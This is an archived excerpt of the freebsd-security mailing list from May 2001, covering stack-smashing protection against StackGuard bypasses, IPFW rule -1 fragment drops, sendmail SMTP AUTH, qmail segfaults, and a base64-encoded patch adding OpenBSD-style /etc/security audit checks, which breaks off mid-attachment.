From owner-freebsd-security Sun May 20 18:12: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from virginia.yamato.ibm.co.jp (virginia.yamato.ibm.co.jp [203.141.89.165]) by hub.freebsd.org (Postfix) with ESMTP id 41D9C37B422 for ; Sun, 20 May 2001 18:12:00 -0700 (PDT) (envelope-from etoh@trl.ibm.co.jp) Received: from ns.trl.ibm.com (ns.trl.ibm.com [9.116.48.18]) by virginia.yamato.ibm.co.jp (8.9.3/3.7W/GW3.3) with ESMTP id KAA14674; Mon, 21 May 2001 10:11:49 +0900 Received: from localhost by ns.trl.ibm.com (AIX4.3/8.9.3/TRL4.5SRV) id KAA24158; Mon, 21 May 2001 10:11:49 +0900 To: mixtim@home.com Cc: security@FreeBSD.ORG Subject: Re: Base system with gcc stack-smashing protector In-Reply-To: <20010518211301.A53682@home.com> References: <20010519093227T.etoh@trl.ibm.com> <20010518211301.A53682@home.com> X-Mailer: Mew version 1.94b48 on Emacs 20.7 / Mule 4.0 (HANANOEN) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20010521101149B.etoh@trl.ibm.com> Date: Mon, 21 May 2001 10:11:49 +0900 From: Hiroaki Etoh X-Dispatcher: imput version 990813(IM119) Lines: 26 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At Fri, 18 May 2001 21:13:01 -0400, Mixtim wrote: > Have you seen Phrack Magazine issue 56, article 5? The title is "Bypassing > StackGuard and StackShield." > > "This article is an attempt to demonstrate that it is possible to > exploit stack overflow vulnerabilities on systems secured by > StackGuard or StackShield even in hostile environments (such as when > the stack is non-executable)." > > Does your patch address their concerns? Yes. The article pointed out that StackGuard or StackShield protection can be bypassed using buffer overflows to alter other pointers in the program besides the return address. (StackGuard introduced a remediation, which is called XOR canary protection with a little bit performance overhead.) My protection changes the locations of such pointers to the location behind buffers, so those pointers can not be altered using buffer overflows. It acheives the protection without performance degradation. Please see http://www.trl.ibm.com/projects/security/ssp/node4.html#SECTION00042000000000000000 in detail. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 21 4:45:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from sivka.carrier.kiev.ua (sivka.carrier.kiev.ua [193.193.193.101]) by hub.freebsd.org (Postfix) with ESMTP id 82F1637B42C for ; Mon, 21 May 2001 04:45:21 -0700 (PDT) (envelope-from diman@asd-g.com) Received: from core.is.kiev.ua (p187.is.kiev.ua [62.244.5.187] (may be forged)) by sivka.carrier.kiev.ua (8/Kilkenny_is_better) with ESMTP id ORK05445; Mon, 21 May 2001 14:45:12 +0300 (EEST) (envelope-from diman@asd-g.com) Received: from [10.203.1.10] ([10.203.1.10]) by core.is.kiev.ua (8.11.1/ASDG-2.3-NR) with ESMTP id f4LBjBM64945; Mon, 21 May 2001 14:45:11 +0300 (EEST) (envelope-from diman@asd-g.com) Date: Mon, 21 May 2001 12:41:52 +0000 (GMT) From: diman X-Sender: diman@portal.none.ua To: Lowell Gilbert Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPFW Rule -1 Always = Attack? In-Reply-To: <44y9rtf9ox.fsf@lowellg.ne.mediaone.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 19 May 2001, Lowell Gilbert wrote: > dwplists@loop.com (D. W. Piper) writes: > > > If I understand things correctly from the archives and the IPFW man > > page, IPFW rule -1 is built into the firewall, and only applies to > > rejecting IP fragments with a fragment offset of one. The man page > > further states, "This is a valid packet, but it only has one use, to try > > to circumvent firewalls." > > > > Does that mean that every packet dropped by rule -1 indicates a > > deliberate attempt to circumvent the firewall, and should be reported to > > the appropriate network administrator for the source IP address? > > It's *possible* that the rule could be triggered by something that > wasn't an attack. Thinking about it briefly, it seems slightly more > likely that it's part of a probe, rather than an actual attack > However, reporting to the network administrator for that address is > almost certainly useless in any case, because an attacker would > probably have spoofed that address anyway. [An attacker wouldn't ever > get any response from that packet in any case.] Attacker can get answer from a destination host. It's a ipfw between if he willn't. Easy rule :) > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 21 6:11: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from www.suntop-cn.com (www.suntop-cn.com [61.140.76.155]) by hub.freebsd.org (Postfix) with ESMTP id 769FD37B422 for ; Mon, 21 May 2001 06:10:58 -0700 (PDT) (envelope-from slack@suntop-cn.com) Received: from slack ([61.140.48.224]) (authenticated) by www.suntop-cn.com (8.11.3/8.11.3) with ESMTP id f4LDAHD71180; Mon, 21 May 2001 21:10:21 +0800 (CST) (envelope-from slack@suntop-cn.com) Message-ID: <002401c0e1f7$66d3c460$9201a8c0@home.net> From: "edwin chan" To: "Hajimu UMEMOTO" Cc: References: <002c01c0dfa8$c6ae8600$9201a8c0@home.net> <20010519.001015.48821893.ume@mahoroba.org> Subject: Re: AUTH and sendmail Date: Mon, 21 May 2001 21:10:14 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org HI, Hajimu UMEMOTO thanks, your answer very useful to me, I read some articles about DRAC / POP before SMTP and SMTP AUTH. One thing is very clarifyed, sendmail use SMTP AUTH as it's "office function". I should try it soon edwin chan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 21 7:41:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from be-well.ilk.org (lowellg.ne.mediaone.net [24.147.184.128]) by hub.freebsd.org (Postfix) with ESMTP id DD6AD37B422 for ; Mon, 21 May 2001 07:41:09 -0700 (PDT) (envelope-from lowell@be-well.ilk.org) Received: (from lowell@localhost) by be-well.ilk.org (8.11.3/8.11.3) id f4LEf8Z04609; Mon, 21 May 2001 10:41:08 -0400 (EDT) (envelope-from lowell) To: freebsd-security@freebsd.org Subject: Re: IPFW Rule -1 Always = Attack? References: <44y9rtf9ox.fsf@lowellg.ne.mediaone.net> From: Lowell Gilbert Date: 21 May 2001 10:41:07 -0400 In-Reply-To: diman@asd-g.com's message of "21 May 2001 13:45:44 +0200" Message-ID: <44ae4669z0.fsf@lowellg.ne.mediaone.net> Lines: 39 X-Mailer: Gnus v5.7/Emacs 20.7 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org diman@asd-g.com (diman) writes: > On 19 May 2001, Lowell Gilbert wrote: > > > dwplists@loop.com (D. W. Piper) writes: > > > > > If I understand things correctly from the archives and the IPFW man > > > page, IPFW rule -1 is built into the firewall, and only applies to > > > rejecting IP fragments with a fragment offset of one. The man page > > > further states, "This is a valid packet, but it only has one use, to try > > > to circumvent firewalls." > > > > > > Does that mean that every packet dropped by rule -1 indicates a > > > deliberate attempt to circumvent the firewall, and should be reported to > > > the appropriate network administrator for the source IP address? > > > > It's *possible* that the rule could be triggered by something that > > wasn't an attack. Thinking about it briefly, it seems slightly more > > likely that it's part of a probe, rather than an actual attack > > However, reporting to the network administrator for that address is > > almost certainly useless in any case, because an attacker would > > probably have spoofed that address anyway. [An attacker wouldn't ever > > get any response from that packet in any case.] > > Attacker can get answer from a destination host. It's a ipfw between > if he willn't. Easy rule :) This is incorrect. The attacker can't get an answer in either case. The destination host won't reply unless the packet with the fragment offset of zero *also* got through to that destination host, in which case this rule doesn't matter. If it isn't the case, the destination host will never get a whole packet, and will never respond. The "rule -1" situation is only useful (to attackers) as part of a traffic analysis scheme, and not terribly even for that. However, there's no downside to dropping these packets, so we do. - Lowell To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 21 12:28:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from euphoria.digitalextreme.org (euphoria.digitalextreme.org [204.212.149.31]) by hub.freebsd.org (Postfix) with SMTP id 8D17E37B424 for ; Mon, 21 May 2001 12:28:20 -0700 (PDT) (envelope-from subscribed@de-net.org) Received: (qmail 39553 invoked by uid 504); 21 May 2001 12:24:05 -0000 Received: from unknown (HELO extremist) (204.212.149.57) by euphoria.digitalextreme.org with SMTP; 21 May 2001 12:24:05 -0000 From: "Dan Graaff" To: Subject: Qmail + FreeBSD 4.3 Date: Mon, 21 May 2001 12:27:34 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 In-Reply-To: <44ae4669z0.fsf@lowellg.ne.mediaone.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello all.. After the recent hacking of my affiliate, I'm starting to get worried about my own qmail boxes. One of them has had no errors for a month, now I'm starting to get these in my root mailers: xxxxxxx.xxxxxxxxxxx.xxx kernel log messages: > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P > pid 28411 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 28548 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 28923 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 29902 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 30470 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 30874 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 32198 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 32552 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 32923 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 33584 (qmailadmin), uid 89: exited on signal 11 > pid 34603 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 34624 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 34662 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 34898 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 34910 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 34935 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 35228 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 35286 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 35297 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 35651 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 35693 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 35772 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 36172 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 36204 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 36312 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 36608 (vdelivermail), uid 89: exited on signal 11 (core dumped) > pid 36631 (vdelivermail), uid 89: exited on signal 11 (core dumped) Any thoughts? Help? -Dan Graaff / Digital To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 21 13:53:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from pkl.net (spoon.pkl.net [212.111.57.14]) by hub.freebsd.org (Postfix) with ESMTP id EC74A37B422 for ; Mon, 21 May 2001 13:52:53 -0700 (PDT) (envelope-from rik@pkl.net) Received: from localhost (rik@localhost) by pkl.net (8.9.3/8.9.3) with ESMTP id VAA17974 for ; Mon, 21 May 2001 21:52:43 +0100 Date: Mon, 21 May 2001 21:52:43 +0100 (BST) From: Rik To: freebsd-security@freebsd.org Subject: A few more tests to add to /etc/security Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="1876168249-1983639606-990478082=:17879" Content-ID: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --1876168249-1983639606-990478082=:17879 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Hi, I have been using OpenBSD for a while, and I am about try try FreeBSD, and while browsing /etc, I noticed that the /etc/security script is slightly sparse, so I took the liberty of adding a few tests from the OpenBSD /etc/security script. I have *NOT* checked that they work, yet, although a lot of the tests should work straight off. Pay particular attention to the master.passwd checks, since I haven't a clue if there's a different format between OpenBSD and FreeBSD... Anyway, hope these help, have funm etc... rik --1876168249-1983639606-990478082=:17879 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME=patch-more-security Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Some more /etc/security tests Content-Disposition: ATTACHMENT; FILENAME=patch-more-security VGhpcyBwYXRjaCBhZGRzIGluIGEgYnVuY2ggb2YgY2hlY2tzIHRoYXQgT3Bl bkJTRCAyLjkgKGFzIG9mIDIxL01heS8yMDAxLA0KcHJlcmVsZWFzZSkgZG9l cy4NCg0KSXQgKkhBUyBOT1QqIGJlZW4gY2hlY2tlZC4gSSBkb24ndCBldmVu IHJ1biBGcmVlQlNEICh5ZXQpLiBZb3UgYXJlIHdlbGNvbWUgdG8NCmhhY2sg dGhpcyBhcm91bmQuIFBsZWFzZSBjaGVjayBhbGwgb2YgdGhlIG5ldyBjaGVj a3MsIHNpbmNlIEkgaGF2ZW4ndC4gVGhleQ0KYXJlIGFsbCB3b3J0aCBkb2lu Zywgc28gcGxlYXNlIGRvIGluY2x1ZGUgdGhlbS4NCg0KRW5qb3ksDQoNCnJp aw0KDQotLS0gZmJzZC1zZWN1cml0eQlNb24gTWF5IDIxIDE5OjMxOjE5IDIw MDENCisrKyBzZWN1cml0eQlNb24gTWF5IDIxIDIwOjA0OjA4IDIwMDENCkBA IC02MSw3ICs2MSw0MDMgQEANCiBob3N0PWBob3N0bmFtZWANCiBbICRzZmxh ZyA9IEZBTFNFIF0gJiYgZWNobyAiU3ViamVjdDogJHtob3N0fSBzZWN1cml0 eSBjaGVjayBvdXRwdXQiDQogDQotdW1hc2sgMDI3DQordW1hc2sgMDc3DQor DQorTVA9L2V0Yy9tYXN0ZXIucGFzc3dkDQorYXdrIC1GOiAnew0KKyAgICBp ZiAoJDAgfiAvXlsgICAgIF0qJC8pIHsNCisgICAgICAgIHByaW50ZigiTGlu ZSAlZCBpcyBhIGJsYW5rIGxpbmUuXG4iLCBOUik7DQorICAgICAgICBuZXh0 Ow0KKyAgICB9DQorICAgIGlmIChORiAhPSAxMCkNCisgICAgICAgIHByaW50 ZigiTGluZSAlZCBoYXMgdGhlIHdyb25nIG51bWJlciBvZiBmaWVsZHM6XG4l c1xuIiwgTlIsICQwKTsNCisgICAgaWYgKCQxIH4gL15bKy1dLykNCisgICAg ICAgIG5leHQ7DQorICAgIGlmICgkMSA9PSAiIikNCisgICAgICAgIHByaW50 ZigiTGluZSAlZCBoYXMgYW4gZW1wdHkgbG9naW4gZmllbGQ6XG4lc1xuIiwg TlIsICQwKTsNCisgICAgZWxzZSBpZiAoJDEgIX4gL15bQS1aYS16MC05XVtB LVphLXowLTlfLV0qJC8pDQorICAgICAgICBwcmludGYoIkxvZ2luICVzIGhh cyBub24tYWxwaGFudW1lcmljIGNoYXJhY3RlcnMuXG4iLCAkMSk7DQorICAg IGlmIChsZW5ndGgoJDEpID4gMzEpDQorICAgICAgICBwcmludGYoIkxvZ2lu ICVzIGhhcyBtb3JlIHRoYW4gMzEgY2hhcmFjdGVycy5cbiIsICQxKTsNCisg ICAgaWYgKCQyID09ICIiKQ0KKyAgICAgICAgcHJpbnRmKCJMb2dpbiAlcyBo YXMgbm8gcGFzc3dvcmQuXG4iLCAkMSk7DQorICAgIGlmICgkMiAhPSAiIiAm JiBsZW5ndGgoJDIpICE9IDEzICYmICgkMTAgfiAvLipzaCQvIHx8ICQxMCA9 PSAiIikgJiYNCisgICAgICAgICAgICgkMiAhfiAvXlwkWzAtOWEtZl0rXCQv KSAmJiAoJDIgIT0gInNrZXkiKSkgew0KKyAgICAgICAgaWYgKHN5c3RlbSgi dGVzdCAtcyAvZXRjL3NrZXlrZXlzICYmIGdyZXAgLXEgXCJeIiQxIiBcIg0K Ky9ldGMvc2tleWtleXMiKSA9PSAwKQ0KKyAgICAgICAgICAgIHByaW50Zigi TG9naW4gJXMgaXMgb2ZmIGJ1dCBzdGlsbCBoYXMgYSB2YWxpZCBzaGVsbCBh bmQgYW4gZW50cnkNCitpbiAvZXRjL3NrZXlrZXlzLlxuIiwgJDEpOw0KKyAg ICAgICAgaWYgKHN5c3RlbSgidGVzdCAtZCAiJDkiIC1hICEgLXIgIiQ5IiIp ID09IDApDQorICAgICAgICAgICAgcHJpbnRmKCJMb2dpbiAlcyBpcyBvZmYg YnV0IHN0aWxsIGhhcyB2YWxpZCBzaGVsbCBhbmQgaG9tZQ0KK2RpcmVjdG9y eSBpcyB1bnJlYWRhYmxlXG5cdCBieSByb290OyBjYW5ub3QgY2hlY2sgZm9y IGV4aXN0ZW5jZSBvZiBhbHRlcm5hdGUNCithY2Nlc3MgZmlsZXMuXG4iLCAk MSk7DQorICAgICAgICBlbHNlIGlmIChzeXN0ZW0oImZvciBmaWxlIGluIC5z c2ggLnJob3N0cyAuc2hvc3RzIC5rbG9naW47IGRvIGlmIHRlc3QNCistZSAi JDkiLyRmaWxlOyB0aGVuIGlmICgobHMgLWxkICIkOSIvJGZpbGUgfCBjdXQg LWIgMi0xMCB8IGdyZXAgLXEgcikgJiYgKHRlc3QNCishIC1PICIkOSIvJGZp bGUpKSA7IHRoZW4gZXhpdCAxOyBmaTsgZmk7IGRvbmUiKSkNCisgICAgICAg ICAgICAgcHJpbnRmKCJMb2dpbiAlcyBpcyBvZmYgYnV0IHN0aWxsIGhhcyBh IHZhbGlkIHNoZWxsIGFuZCBhbHRlcm5hdGUNCithY2Nlc3MgZmlsZXMgaW5c blx0IGhvbWUgZGlyZWN0b3J5IGFyZSBzdGlsbCByZWFkYWJsZS5cbiIsJDEp Ow0KKyAgICB9DQorICAgIGlmICgkMyA9PSAwICYmICQxICE9ICJyb290IikN CisgICAgICAgIHByaW50ZigiTG9naW4gJXMgaGFzIGEgdXNlciBJRCBvZiAw LlxuIiwgJDEpOw0KKyAgICBpZiAoJDMgPCAwKQ0KKyAgICAgICAgcHJpbnRm KCJMb2dpbiAlcyBoYXMgYSBuZWdhdGl2ZSB1c2VyIElELlxuIiwgJDEpOw0K KyAgICBpZiAoJDQgPCAwKQ0KKyAgICAgICAgcHJpbnRmKCJMb2dpbiAlcyBo YXMgYSBuZWdhdGl2ZSBncm91cCBJRC5cbiIsICQxKTsNCit9JyA8ICRNUCA+ ICRPVVRQVVQNCitpZiBbIC1zICRPVVRQVVQgXSA7IHRoZW4NCisgICAgZWNo byAiXG5DaGVja2luZyB0aGUgJHtNUH0gZmlsZToiDQorICAgIGNhdCAkT1VU UFVUDQorZmkNCisNCithd2sgLUY6ICd7IHByaW50ICQxIH0nICRNUCB8IHNv cnQgfCB1bmlxIC1kID4gJE9VVFBVVA0KK2lmIFsgLXMgJE9VVFBVVCBdIDsg dGhlbg0KKyAgICBlY2hvICJcbiR7TVB9IGhhcyBkdXBsaWNhdGUgdXNlciBu YW1lcy4iDQorICAgIGNvbHVtbiAkT1VUUFVUDQorZmkNCisNCithd2sgLUY6 ICcvXlteXCtdLyB7IHByaW50ICQxICIgIiAkMyB9JyAkTVAgfCBzb3J0IC1u ICsxIHwgdGVlICRUTVAxIHwNCit1bmlxIC1kIC1mIDEgfCBhd2sgJ3sgcHJp bnQgJDIgfScgPiAkVE1QMg0KK2lmIFsgLXMgJFRNUDIgXSA7IHRoZW4NCisg ICAgZWNobyAiXG4ke01QfSBoYXMgZHVwbGljYXRlIHVzZXIgSUQncy4iDQor ICAgICAgICB3aGlsZSByZWFkIHVpZDsgZG8NCisgICAgICAgICAgICAgICAg Z3JlcCAtdyAkdWlkICRUTVAxDQorICAgICAgICBkb25lIDwgJFRNUDIgfCBj b2x1bW4NCitmaQ0KKw0KKyMgQ2hlY2sgdGhlIGdyb3VwIGZpbGUgc3ludGF4 Lg0KK0dSUD0vZXRjL2dyb3VwDQorYXdrIC1GOiAnew0KKyAgICBpZiAoJDAg fiAvXlsgICAgIF0qJC8pIHsNCisgICAgICAgIHByaW50ZigiTGluZSAlZCBp cyBhIGJsYW5rIGxpbmUuXG4iLCBOUik7DQorICAgICAgICBuZXh0Ow0KKyAg ICB9DQorICAgIGlmICgkMSB+IC9eWystXS4qJC8pDQorICAgICAgICBuZXh0 Ow0KKyAgICBpZiAoTkYgIT0gNCkNCisgICAgICAgIHByaW50ZigiTGluZSAl ZCBoYXMgdGhlIHdyb25nIG51bWJlciBvZiBmaWVsZHM6XG4lc1xuIiwgTlIs ICQwKTsNCisgICAgaWYgKCQxICF+IC9eW0EtemEtejAtOV1bQS16YS16MC05 Xy1dKiQvKQ0KKyAgICAgICAgcHJpbnRmKCJHcm91cCAlcyBoYXMgbm9uLWFs cGhhbnVtZXJpYyBjaGFyYWN0ZXJzLlxuIiwgJDEpOw0KKyAgICBpZiAobGVu Z3RoKCQxKSA+IDMxKQ0KKyAgICAgICAgcHJpbnRmKCJHcm91cCAlcyBoYXMg bW9yZSB0aGFuIDMxIGNoYXJhY3RlcnMuXG4iLCAkMSk7DQorICAgIGlmICgk MyAhfiAvWzAtOV0qLykNCisgICAgICAgIHByaW50ZigiTG9naW4gJXMgaGFz IGEgbmVnYXRpdmUgZ3JvdXAgSUQuXG4iLCAkMSk7DQorfScgPCAkR1JQID4g JE9VVFBVVA0KK2lmIFsgLXMgJE9VVFBVVCBdIDsgdGhlbg0KKyAgICBlY2hv ICJcbkNoZWNraW5nIHRoZSAke0dSUH0gZmlsZToiDQorICAgIGNhdCAkT1VU UFVUDQorZmkNCisNCithd2sgLUY6ICd7IHByaW50ICQxIH0nICRHUlAgfCBz b3J0IHwgdW5pcSAtZCA+ICRPVVRQVVQNCitpZiBbIC1zICRPVVRQVVQgXSA7 IHRoZW4NCisgICAgZWNobyAiXG4ke0dSUH0gaGFzIGR1cGxpY2F0ZSBncm91 cCBuYW1lcy4iDQorICAgIGNvbHVtbiAkT1VUUFVUDQorZmkNCisNCitlY2hv ICJDaGVja2luZyByb290IGNzaCBwYXRocywgYW5kIHVtYXNrIHZhbHVlczpc biR7bGlzdH0iDQorcmhvbWU9L3Jvb3QNCit1bWFza3NldD1ubw0KK2xpc3Q9 Ii9ldGMvY3NoLmNzaHJjIC9ldGMvY3NoLmxvZ2luICR7cmhvbWV9Ly5jc2hy YyAke3Job21lfS8ubG9naW4iDQorZm9yIGkgaW4gJGxpc3QgOyBkbw0KKwlp ZiBbIC1zICRpIF0gOyB0aGVuDQorCQlpZiBlZ3JlcCB1bWFzayAkaSA+IC9k ZXYvbnVsbCA7IHRoZW4NCisJCQl1bWFza3NldD15ZXMNCisJCWZpDQorCQll Z3JlcCB1bWFzayAkaSB8DQorCQlhd2sgJyQyICUgMTAwIDwgMjAgXA0KKwkJ CXsgcHJpbnQgIlJvb3QgdW1hc2sgaXMgZ3JvdXAgd3JpdGVhYmxlIiB9DQor CQkJICQyICUgMTAgPCAyIFwNCisJCQl7IHByaW50ICJSb290IHVtYXNrIGlz IG90aGVyIHdyaXRlYWJsZSIgfScNCisJCVNBVkVfUEFUSD0kUEFUSA0KKwkJ dW5zZXQgUEFUSA0KKwkJL2Jpbi9jc2ggLWYgLXMgPDwgZW5kLW9mLWNzaCA+ IC9kZXYvbnVsbCAyPiYxDQorCQkJc291cmNlICRpDQorCQkJaWYgKFwkP3Bh dGgpIHRoZW4NCisJCQkJL2Jpbi9scyAtbGRnVCBcJHBhdGggPiAkVE1QDQor CQkJZWxzZQ0KKwkJCQljYXQgL2Rldi9udWxsID4gJFRNUA0KKwkJCWVuZGlm DQorZW5kLW9mLWNzaA0KKwkJUEFUSD0kU0FWRV9QQVRIDQorCQlhd2sgJ3sN CisJCQlpZiAoJDEwIH4gL15cLiQvKSB7DQorCQkJCXByaW50ICJUaGUgcm9v dCBwYXRoIGluY2x1ZGVzIC4iOw0KKwkJCQluZXh0Ow0KKwkJCX0NCisJCQkg fQ0KKwkJCSQxIH4gL15kLi4uLncvIFwNCisJCXsgcHJpbnQgIlJvb3QgcGF0 aCBkaXJlY3RvcnkgIiAkMTAgIiBpcyBncm91cCB3cml0ZWFibGUuIiB9IFwN CisJCQkkMSB+IC9eZC4uLi4uLi53LyBcDQorCQl7IHByaW50ICRSb290IHBh dGggZGlyZWN0b3J5ICIgJDEwICIgaXMgb3RoZXIgd3JpdGVhYmxlLiIgfScg XA0KKwkJPCAkVE1QDQorCWlmDQorZG9uZQ0KK2lmIFsgJHVtYXNrc2V0ID0g Im5vIiBdIDsgdGhlbg0KKwllY2hvICJcblJvb3QgY3NoIHN0YXJ0dXAgZmls ZXMgZG8gbm90IHNldCB0aGUgdW1hc2suIg0KK2ZpDQorDQorZWNobyAiQ2hl Y2tpbmcgcm9vdCBzaCBwYXRocywgdW1hc2sgdmFsdWVzOlxueyRsaXN0fSIN CityaG9tZT0vcm9vdA0KK3VtYXNrc2V0PW5vDQorbGlzdD0iL2V0Yy9wcm9m aWxlICR7cmhvbWV9Ly5wcm9maWxlIg0KK2ZvciBpIGluICRsaXN0OyBkbw0K KyAgICBpZiBbIC1zICRpIF0gOyB0aGVuDQorICAgICAgICBpZiBlZ3JlcCB1 bWFzayAkaSA+IC9kZXYvbnVsbCA7IHRoZW4NCisgICAgICAgICAgICB1bWFz a3NldD15ZXMNCisgICAgICAgIGZpDQorICAgICAgICBlZ3JlcCB1bWFzayAk aSB8DQorICAgICAgICBhd2sgJyQyICUgMTAwIDwgMjAgXA0KKyAgICAgICAg ICAgIHsgcHJpbnQgIlJvb3QgdW1hc2sgaXMgZ3JvdXAgd3JpdGVhYmxlIiB9 IFwNCisgICAgICAgICAgICAgJDIgJSAxMCA8IDIgXA0KKyAgICAgICAgICAg IHsgcHJpbnQgIlJvb3QgdW1hc2sgaXMgb3RoZXIgd3JpdGVhYmxlIiB9JyA+ PiAkT1VUUFVUDQorICAgICAgICBTQVZFX1BBVEg9JFBBVEgNCisgICAgICAg IFNBVkVfRU5WPSRFTlYNCisgICAgICAgIHVuc2V0IFBBVEggRU5WDQorICAg ICAgICAvYmluL3NoIDw8IGVuZC1vZi1zaCA+IC9kZXYvbnVsbCAyPiYxDQor ICAgICAgICAgICAgLiAkaQ0KKyAgICAgICAgICAgIGlmIFsgWCJcJFBBVEgi ICE9ICJYIiBdOyB0aGVuDQorICAgICAgICAgICAgICAgIGxpc3Q9XGBlY2hv IFwkUEFUSCB8IC91c3IvYmluL3NlZCAtZSAncy86LyAvZydcYA0KKyAgICAg ICAgICAgICAgICAvYmluL2xzIC1sZGdUIFwkbGlzdCA+ICRUTVAxDQorICAg ICAgICAgICAgZWxzZQ0KKyAgICAgICAgICAgICAgICA+ICRUTVAxDQorICAg ICAgICAgICAgZmkNCisgICAgICAgICAgICBlY2hvIFwkRU5WID4+ICRUTVAy DQorZW5kLW9mLXNoDQorICAgICAgICBQQVRIPSRTQVZFX1BBVEgNCisgICAg ICAgIEVOVj0kU0FWRV9FTlYNCisgICAgICAgIGF3ayAnew0KKyAgICAgICAg ICAgIGlmICgkMTAgfiAvXlwuJC8pIHsNCisgICAgICAgICAgICAgICAgcHJp bnQgIlRoZSByb290IHBhdGggaW5jbHVkZXMgLiI7DQorICAgICAgICAgICAg ICAgIG5leHQ7DQorICAgICAgICAgICAgfQ0KKyAgICAgICAgICAgICB9DQor ICAgICAgICAgICAgICQxIH4gL15kLi4uLncvIFwNCisgICAgICAgIHsgcHJp bnQgIlJvb3QgcGF0aCBkaXJlY3RvcnkgIiAkMTAgIiBpcyBncm91cCB3cml0 ZWFibGUuIiB9IFwNCisgICAgICAgICAgICAgJDEgfiAvXmQuLi4uLi4udy8g XA0KKyAgICAgICAgeyBwcmludCAiUm9vdCBwYXRoIGRpcmVjdG9yeSAiICQx MCAiIGlzIG90aGVyIHdyaXRlYWJsZS4iIH0nIFwNCisgICAgICAgIDwgJFRN UDEgPj4gJE9VVFBVVA0KKw0KKyAgICBmaQ0KK2RvbmUNCitpZiBbICR1bWFz a3NldCA9ICJubyIgXSA7IHRoZW4NCisgICAgZWNobyAiXG5Sb290IHNoIHN0 YXJ0dXAgZmlsZXMgZG8gbm90IHNldCB0aGUgdW1hc2suIg0KK2ZpDQorDQor ZWNobyAiQ2hlY2tpbmcgcm9vdCBrc2ggcGF0aHMsIHVtYXNrIHZhbHVlczpc bnskbGlzdH0iDQorIyBBIGdvb2QgLmtzaHJjIHdpbGwgbm90IGhhdmUgYSB1 